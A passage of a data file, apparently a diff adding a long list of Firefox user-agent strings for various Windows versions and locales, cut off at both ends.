rv:16.0.1) Gecko/20121011 Firefox/21.0.1 +Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0 +Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0 +Mozilla/5.0 (Windows NT 6.2; WOW64; rv:15.0) Gecko/20120910144328 Firefox/15.0.2 +Mozilla/5.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1 +Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20130514 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0 +Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7) Gecko/20040803 Firefox/0.9.3 +Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 +Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8 +Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 (ax) +Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Win98; es-ES; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050318 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Win98; rv:1.7.3) Gecko/20040913 Firefox/0.10 +Mozilla/5.0 (Windows; U; Win98; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 +Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 +Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 +Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7) Gecko/20040803 Firefox/0.9.3 +Mozilla/5.0 (Windows; U; Windows NT 4.0; en-US; rv:1.8.0.2) Gecko/20060418 Firefox/1.5.0.2; +Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.6) Gecko/20040206 Firefox/0.8 +Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.6) Gecko/20040206 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050223 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7) Gecko/20040626 Firefox/0.9.1 +Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7) Gecko/20040803 Firefox/0.9.3 +Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050321 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.4) Gecko/20070509 Firefox/2.0.0 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4 +Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.0.2) Gecko/2008092313 Firefox/3.1.6 +Mozilla/5.0 (Windows; U; Windows NT 5.0; es-ES; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.0; es-ES; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.0; fr; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.0; fr; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 5.0; it; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.0; pl; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13 +Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10.1 +Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 +Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1) Gecko/20060111 Firefox/0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; ca; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 +Mozilla/5.0 (Windows; U; Windows NT 5.1; da-DK; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.6) Gecko/20040206 Firefox/0.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050223 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050226 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7) Gecko/20040626 Firefox/0.9.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7) Gecko/20040803 Firefox/0.9.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.9.2.20) Gecko/20110803 Firefox +Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.19) Gecko/20081201 Firefox/2.0.0.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.21 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.2pre) Gecko/2008082305 Firefox/3.0.2pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Firefox/3.0.8) +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.8) Gecko/2009032609 Firefox/3.07 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.0.04506.30) +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.0.04506.648) +Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0.1pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6) Gecko/20050226 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6) Gecko/20050321 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.6) Gecko/2009011913 Firefox +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 GTB7.1 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 AskTbUTR/3.11.3.15590 Firefox/3.6.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.7.10) Gecko/20050716 Firefox/1.0.5 +Mozilla/5.0 (Windows; U; Windows NT5.1; en; rv:1.7.10) Gecko/20050716 Firefox/1.0.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.1.13) Gecko/20100914 Firefox/3.6.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 (ax) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 (ax) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 (ax) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.10pre) Gecko/20070211 Firefox/1.5.0.10pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060309 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060406 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060419 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.9.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17pre) Gecko/20080715 Firefox/2.0.0.8pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090403 Firefox/1.1.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070118 Firefox/2.0.0.2pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b1) Gecko/20060707 Firefox/2.0b1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050729 Firefox/1.0+ +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060319 Firefox/2.0a1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) FBSMTWB +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6pre) Gecko/2008121605 Firefox/3.0.6pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6pre) Gecko/2009011606 Firefox/3.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.0 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.11 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 AskTbPLTV5/3.8.0.12304 Firefox/3.5.16 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20120427 Firefox/15.0a1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729) FBSMTWB +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) FBSMTWB +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b3pre) Gecko/20090213 Firefox/3.0.1b3pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090401 Firefox/3.5b4pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090409 Firefox/3.5b4pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b5pre) Gecko/20090517 Firefox/3.5b4pre (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.20) Gecko/20110803 AskTbFWV5/3.13.0.17701 Firefox/3.6.20 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729; .NET4.0C) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/5.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.0.16 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051220 Firefox/1.6a1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060121 Firefox/1.6a1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060323 Firefox/1.6a1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b1) Gecko/2007110703 Firefox/3.0b1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b4pre) Gecko/2008020708 Firefox/3.0b4pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008030706 Firefox/3.0b5pre +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:2.0.1) Gecko/20110606 Firefox/4.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8) Gecko/20060321 Firefox/2.0a1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB +Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; fa; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-be; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.6) Gecko/20050318 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.6) Gecko/20040206 Firefox/0.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.7) Gecko/20040707 Firefox/0.9.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.7) Gecko/20040803 Firefox/0.9.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 (.NET CLR 3.0.04506.30) +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.3C +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729; .NET4.0C) +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 +Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.6) Gecko/20050318 Firefox/1.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.9a1) Gecko/20100202 Firefox/3.0.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8b5) Gecko/20051006 Firefox/1.4.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.28) Gecko/20120306 AskTbSTC-SRS/3.13.1.18132 Firefox/3.6.28 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; 